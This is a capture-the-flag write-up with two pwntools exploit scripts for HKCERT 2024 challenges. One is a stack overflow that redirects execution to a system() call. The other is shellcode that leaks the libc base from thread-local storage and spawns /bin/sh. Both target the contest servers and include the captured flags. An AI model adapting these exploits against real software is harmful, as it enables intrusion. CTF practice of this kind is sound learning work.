Chatgtt
Simple pwn:
#!/usr/bin/env python3
from pwn import *
elf = ELF("./chal_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote("c64-chatggt.hkcert24.pwnable.hk", 1337, ssl=True)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val): log.info(name+" = %#x" % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
# return data between d1 and d2
if (d2):
return r.recvuntil(d2,drop=True)
#========= exploit here ===================
'''
0x00000000004011fe <+8>: lea rax,[rip+0xe03] # 0x402008
0x0000000000401205 <+15>: mov rdi,rax
0x0000000000401208 <+18>: call 0x4010c0 <system@plt>
'''
payload = b"EXIT"
payload += b"A"*(256-4)
payload += b"BBBBBBBB"
payload += p64(0x4011fe)
sla(b"the chat): ", payload)
#hkcert24{a_v3ry_g00D_star7}
#========= interactive ====================
r.interactive()
Shellcode Revenge 3
Nice Shellcode challenge, managed to learn a new way to leak libc:
#!/usr/bin/env python3
from pwn import *
elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b *main+364
continue
'''
def start():
if args.REMOTE:
return remote("c49-shellcode-runner3.hkcert24.pwnable.hk", 1337, ssl=True)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val): log.info(name+" = %#x" % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
# return data between d1 and d2
if (d2):
return r.recvuntil(d2,drop=True)
#========= exploit here ===================
#fs:0x0+0xb20 libc base pointer
payload = asm(f'''
mov rbp, fs:0x0
add rbp, 0x60
mov rsp, rbp
mov r10, fs:0x0
mov r10, [r10+0xb20]
mov rdi, r10
add rdi, {hex(next(libc.search("/bin/sh")))}
add r10, {hex(libc.sym.system)}
xor rsi, rsi
xor rdx, rdx
call r10
''')
sla(b"shellcode here (max: 100):", payload)
#hkcert24{y37_4n07h3r_5h3llc0d3_runn3r_bu7_w17h0u7_54ndb0x}
#========= interactive ====================
r.interactive()